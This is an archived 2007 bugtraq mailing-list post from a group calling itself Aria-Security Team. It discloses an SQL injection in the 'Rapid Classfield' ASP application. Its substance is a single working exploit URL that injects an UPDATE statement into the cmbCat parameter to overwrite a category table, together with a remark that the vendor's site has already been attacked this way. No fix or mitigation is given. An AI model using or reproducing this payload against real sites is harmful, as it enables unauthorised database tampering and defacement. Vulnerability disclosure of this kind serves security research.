Main Archive Page > Month Archives  > bugtraq archives

Aria-Security.Net Research: Request For Travel Sql Injection

From: <Advisory_at_nospam>
Date: Thu Nov 08 2007 - 02:31:52 GMT
To: bugtraq@securityfocus.com

('binary' encoding is not supported, stored as-is)
Aria-Security Team,
http://Aria-Security.net

---

Rapid Classfield SQL Injection
Shout Outs: AurA, imm02tal
Vendor: http://www.lotfian.com/UK/PORTALS.asp

http://target/agencyCatResult.asp?cmbCat='%20UPDATE%20rftCategory%20set%20Category%20=%20'Aria-Security Team';--

The Vendor's website has been attacked by Emperor Team via this vuln.

Regards,
The-0utl4w
>From Aria-Security.Net

• This message: [ Message body ]
• Next message: h3llcode_at_nospam: "Simple Machine Forum - Private section/posts/info disclosure"
• Previous message: buzzy_at_nospam: "Re: iDefense Security Advisory 11.07.07: Oracle 10g R2 PITRIG_DROPMETADATA Buffer Overflow Vulnerability"

• Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ]